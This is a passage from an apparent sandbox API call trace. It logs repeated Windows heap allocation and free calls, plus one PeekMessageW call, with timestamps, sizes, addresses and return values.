Flags=0x0, Size=0x20) returned 0x31ef540 [0093.079] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) 